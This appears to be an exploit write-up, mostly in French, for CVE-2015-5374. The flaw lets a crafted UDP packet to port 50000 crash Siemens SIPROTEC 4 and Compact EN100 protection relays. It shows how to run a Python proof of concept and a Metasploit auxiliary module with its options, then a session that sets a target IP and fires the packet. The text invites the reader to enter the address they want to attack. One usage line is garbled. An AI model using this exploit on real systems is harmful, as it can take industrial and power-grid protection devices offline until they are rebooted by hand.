
Exploit DoS pour CVE-2015-5374 ciblant les modules Ethernet Siemens SIPROTEC 4 et Compact EN100 via un paquet UDP forgé vers le port 50000, avec un module auxiliaire Metasploit inclus.
Ce code envoie un paquet spécialement conçu vers le port 50000/UDP et peut provoquer un déni de service de l'appareil concerné. Un redémarrage manuel est nécessaire pour remettre l'appareil en service. CVE-2015-5374 et un score de base CVSS v2 de 7.8 ont été attribués à cette vulnérabilité.
can@exploit:~/siprotec_dos_poc$ python Siemens_SIPROTEC_DoS.py <target>
CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
Sending packet to <target> ...
Done, say goodbye!
Ce module envoie un paquet spécialement conçu vers le port 50000/UDP et peut provoquer un déni de service de l'appareil concerné. Un redémarrage manuel est nécessaire pour remettre l'appareil en service.
use auxiliary/dos/scada/siemens_siprotec4set RHOST [Target IP], en remplaçant par l'adresse IP que vous souhaitez attaquer.[Target IP]runset RHOST [Target IP], set RPORT [Target Port (Default 50000)].
msf auxiliary(siemens_siprotec4) > info
Name: CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
Module: auxiliary/dos/scada/siemens_siprotec4
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
M. Can Kurnaz
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 50000 yes The target port (UDP)
Description:
This module sends a specially crafted packet to port 50000/UDP
causing a denial of service of the affected (Siemens SIPROTEC 4 and
SIPROTEC Compact) devices. A manual reboot is required to return the
device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8
have been assigned to this vulnerability.
References:
https://www.exploit-db.com/exploits/44103/
https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
msf auxiliary(siemens_siprotec4) > show options
Module options (auxiliary/dos/scada/siemens_siprotec4):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 50000 yes The target port (UDP)
msf auxiliary(siemens_siprotec4) > set rhost 192.168.1.61
rhost => 192.168.1.61
msf auxiliary(siemens_siprotec4) > run
[*] Sending DoS packet ...
[*] Auxiliary module execution completed
msf auxiliary(siemens_siprotec4) >